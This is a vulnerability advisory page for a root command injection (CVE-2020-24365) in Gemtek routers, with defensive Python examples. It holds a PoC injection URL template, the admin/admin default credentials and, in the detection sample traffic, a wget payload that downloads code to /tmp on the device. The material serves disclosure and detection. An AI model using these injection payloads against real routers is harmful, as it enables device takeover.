CVE-2020-24365
Published 2020-09-24
Priority: P2 (70) · Severity: high · CVSS 3.1 base score: 8.8
CVSS 3.1 vector: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Exploit: available
EPSS: 11.41% (95.5th percentile)
An issue was discovered on Gemtek WRTM-127ACN 01.01.02.141 and WRTM-127x9 01.01.02.127 devices. The Monitor Diagnostic network page allows an authenticated attacker to execute a command directly on the target machine. Commands are executed as the root user (uid 0). (Even if a login is required, most routers are left with default credentials.)
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| gemteks | wrtm-127acn_firmware | — | — |
| gemteks | wrtm-127x9_firmware | — | — |
Detection & IOCs (extracted from sources)
URL (from the PoC): http://<target>/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_monitor_diagnostic&mon_diag_type=0&mon_diag_addr=$(<command>;)&mon_ping_num=1&mon_ping_size=4&mon_ping_timeout=1&mon_tracert_hops=&mon_diag_protocol_type=4
Command (what the CGI hands to the shell, with mon_diag_addr substituted for INJECTION): sh -c (ping -4 -c 1 -s 4 -W 1 "INJECTION" > /tmp/mon_diag.log 2>&1; cmscfg -s -n mon_diag_status -v 0)&
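The command line above shows why the bug is exploitable: mon_diag_addr is pasted into a double-quoted argument of a string that sh -c evaluates, and double quotes do not stop $(...) or backtick substitution. The following is an added example, not Gemtek's CGI code and not the PoC: it reconstructs the vulnerable string building from the quoted template, shows what sh makes of a payload placed in double quotes (using printf instead of ping so nothing is pinged), and puts a hardened handler beside it. The function names, the host router.example, the sample payload $(id;) and the hostname allow-list are assumptions for illustration.

```python
"""Added example for CVE-2020-24365: vulnerable command construction vs. a hardened handler.

Assumptions (not from the page): function names, the host 'router.example', the benign
payload '$(id;)' and the IP/hostname validation rule used by the hardened version.
"""
import ipaddress
import re
import subprocess
from urllib.parse import parse_qs, urlsplit

# Command template quoted in the IOC section: the address lands inside double quotes.
TEMPLATE = ('(ping -4 -c 1 -s {size} -W {timeout} "{addr}" > /tmp/mon_diag.log 2>&1; '
            'cmscfg -s -n mon_diag_status -v 0)&')

# Constructed request in the shape of the PoC URL; the payload is percent-encoded
# ('$(id;)') so the ';' survives query-string parsing the way a real client would send it.
EXPLOIT_URL = ("http://router.example/cgi-bin/sysconf.cgi?page=ajax.asp"
               "&action=save_monitor_diagnostic&mon_diag_type=0"
               "&mon_diag_addr=%24%28id%3B%29&mon_ping_num=1&mon_ping_size=4"
               "&mon_ping_timeout=1&mon_tracert_hops=&mon_diag_protocol_type=4")


def parse_request(url: str) -> dict:
    """First value of each query parameter, percent-decoded as the CGI would see it."""
    q = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return {k: v[0] for k, v in q.items()}


def vulnerable_command(params: dict) -> str:
    """Vulnerable pattern: user input interpolated verbatim into a shell command string."""
    return TEMPLATE.format(size=params["mon_ping_size"],
                           timeout=params["mon_ping_timeout"],
                           addr=params["mon_diag_addr"])


def shell_sees(addr: str) -> str:
    """What sh produces for the address when it sits in double quotes, as in the template.
    printf stands in for ping so the demonstration has no side effects."""
    out = subprocess.run(["sh", "-c", f'printf %s "{addr}"'],
                         capture_output=True, text=True)
    return out.stdout


# RFC 1123-style hostname: labels of letters, digits and hyphens, dot separated.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$")


def validate_target(addr: str) -> str:
    """Accept an IP literal or a plain hostname; reject everything else (no escaping attempts)."""
    try:
        return str(ipaddress.ip_address(addr))
    except ValueError:
        pass
    if HOSTNAME_RE.match(addr):
        return addr
    raise ValueError(f"invalid diagnostic target: {addr!r}")


def hardened_argv(params: dict) -> list:
    """Hardened handler: validated target, range-checked numbers, argv list with no shell.
    Run it as subprocess.run(hardened_argv(params)) so metacharacters are never interpreted."""
    addr = validate_target(params["mon_diag_addr"])
    size = int(params["mon_ping_size"])
    timeout = int(params["mon_ping_timeout"])
    if not (0 <= size <= 65507 and 1 <= timeout <= 60):
        raise ValueError("ping size/timeout out of range")
    return ["ping", "-4", "-c", "1", "-s", str(size), "-W", str(timeout), addr]


if __name__ == "__main__":
    req = parse_request(EXPLOIT_URL)
    print("vulnerable:", vulnerable_command(req))
    print("shell sees:", shell_sees("$(echo INJECTED;)"))
    try:
        hardened_argv(req)
    except ValueError as e:
        print("hardened rejects:", e)
```

The fix that matters is the last function: the target is validated against a narrow grammar and handed to the ping binary as an argv element, so there is no shell to interpret $(...). Quoting or escaping the string before pasting it into the template is the weaker option, because a single missed metacharacter reopens the hole.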
- Monitor HTTP GET requests to /cgi-bin/sysconf.cgi with query parameters action=save_monitor_diagnostic and mon_diag_addr containing shell metacharacters such as $( or ; (this is the injection point for CVE-2020-24365).
- Alert on HTTP POST to /cgi-bin/sysconf.cgi?page=login.asp&action=login with default credentials (user_name=admin, user_passwd=admin) followed immediately by requests to the diagnostic endpoint; the sequence is indicative of automated exploit tooling.
- Detect the session cookie 'sid' being sent as a custom HTTP request header (rather than in a standard Cookie header), which is the session-handling pattern used by the exploit.
- Commands injected via mon_diag_addr run as root (uid 0); monitor for unexpected child processes spawned from the CGI handler, especially ping or wget processes with unusual arguments or destinations.
- Watch for creation or modification of /tmp/mon_diag.log on Gemtek WRTM-127ACN / WRTM-127x9 devices; it is the output file written by the injected command pipeline.
- Detect wget invocations writing to /tmp/<filename> on the device, the file-download capability built into the exploit for staging additional payloads.
- The exploit requires authentication, but the researcher notes that most routers are left with default credentials (admin/admin), so in practice the authentication requirement is often trivially satisfied.
- The vulnerability affects two distinct firmware versions; detection rules and patching must cover both 01.01.02.141 (WRTM-127ACN) and 01.01.02.127 (WRTM-127x9).
- The exploit author notes that some injected commands can get stuck, requiring a second identical request to stop them; this double-request pattern (the same payload sent twice) can be used as a behavioral detection signal.
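The three request-level indicators above (metacharacters in mon_diag_addr, a default-credential login followed by a diagnostic request, and the same payload sent twice) can be expressed as one pass over request records. The block below is an added example, not a rule shipped by any vendor or by this page: it runs the logic over constructed records in the shape a reverse proxy or IDS would capture (timestamp, source IP, method, URL, POST body). The record format, the IP addresses, the 60-second login-to-exploit window and the sample payload are assumptions.

```python
"""Added example: detection logic for the CVE-2020-24365 indicators, run over constructed traffic.

Assumptions (not from the page): the record tuple shape, the sample IPs/timestamps,
the 60-second correlation window and the wget staging payload used as sample input.
"""
from collections import defaultdict
from datetime import datetime
from urllib.parse import parse_qs, urlsplit

DIAG_PATH = "/cgi-bin/sysconf.cgi"
# Metacharacters that have no business in a ping target; '&' only survives if percent-encoded.
SHELL_META = ("$(", "`", ";", "|", "&", "\n", "<", ">")


def query(url: str) -> dict:
    """Decoded first value of each query parameter."""
    q = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return {k: v[0] for k, v in q.items()}


def is_injection(url: str) -> bool:
    """Rule 1: save_monitor_diagnostic request whose mon_diag_addr carries shell metacharacters."""
    if urlsplit(url).path != DIAG_PATH:
        return False
    p = query(url)
    if p.get("action") != "save_monitor_diagnostic":
        return False
    return any(m in p.get("mon_diag_addr", "") for m in SHELL_META)


def is_default_login(method: str, url: str, body: str) -> bool:
    """Rule 2 (first half): POST to the login action with the admin/admin default pair."""
    if method != "POST" or urlsplit(url).path != DIAG_PATH:
        return False
    if query(url).get("action") != "login":
        return False
    b = {k: v[0] for k, v in parse_qs(body).items()}
    return (b.get("user_name"), b.get("user_passwd")) == ("admin", "admin")


def analyze(records, login_window_s: int = 60) -> list:
    """records: iterable of (iso_timestamp, src_ip, method, url, body). Returns a list of alerts."""
    alerts = []
    last_default_login = {}           # src_ip -> time of the last admin/admin login
    payload_count = defaultdict(int)  # (src_ip, payload) -> times seen
    for ts, src, method, url, body in records:
        t = datetime.fromisoformat(ts)
        if is_default_login(method, url, body):
            last_default_login[src] = t
            continue
        if method == "GET" and is_injection(url):
            payload = query(url)["mon_diag_addr"]
            alerts.append({"rule": "diag_cmd_injection", "src": src, "payload": payload})
            # Rule 2 (second half): exploitation shortly after a default-credential login.
            if src in last_default_login and \
                    (t - last_default_login[src]).total_seconds() <= login_window_s:
                alerts.append({"rule": "default_creds_then_exploit", "src": src, "payload": payload})
            # Rule 3: the stuck-command workaround, same payload sent a second time.
            payload_count[(src, payload)] += 1
            if payload_count[(src, payload)] == 2:
                alerts.append({"rule": "repeated_identical_payload", "src": src, "payload": payload})
    return alerts


# Constructed sample traffic: one legitimate diagnostic ping from the LAN, then an
# admin/admin login followed by the same wget-staging payload sent twice.
PAYLOAD = "%24%28wget%20http%3A%2F%2F198.51.100.7%2Fx%20-O%20%2Ftmp%2Fx%3B%29"
INJECT_URL = (f"{DIAG_PATH}?page=ajax.asp&action=save_monitor_diagnostic&mon_diag_type=0"
              f"&mon_diag_addr={PAYLOAD}&mon_ping_num=1&mon_ping_size=4&mon_ping_timeout=1"
              f"&mon_tracert_hops=&mon_diag_protocol_type=4")
SAMPLE = [
    ("2020-09-24T10:00:00", "192.0.2.10", "GET",
     f"{DIAG_PATH}?page=ajax.asp&action=save_monitor_diagnostic&mon_diag_type=0"
     f"&mon_diag_addr=8.8.8.8&mon_ping_num=1&mon_ping_size=4&mon_ping_timeout=1", ""),
    ("2020-09-24T10:05:00", "203.0.113.5", "POST",
     f"{DIAG_PATH}?page=login.asp&action=login", "user_name=admin&user_passwd=admin"),
    ("2020-09-24T10:05:02", "203.0.113.5", "GET", INJECT_URL, ""),
    ("2020-09-24T10:05:09", "203.0.113.5", "GET", INJECT_URL, ""),
]

if __name__ == "__main__":
    for a in analyze(SAMPLE):
        print(a["rule"], a["src"], a["payload"])
```

Rule 1 alone already catches the PoC URL shape; the login correlation and the double-request check add confidence when the endpoint is also used legitimately. The host-side indicators (root children of the CGI handler, writes to /tmp/mon_diag.log, wget into /tmp) need device telemetry that a network sensor does not see, so they are left out of this block.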
CVSS provenance
NVD v3.1: 8.8 HIGH, CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
NVD v2.0: 9.0 HIGH, AV:N/AC:L/Au:S/C:C/I:C/A:C (CVSS v2 has no Critical band; 7.0 to 10.0 is High)
No detection rules found.
No writeups or analysis indexed.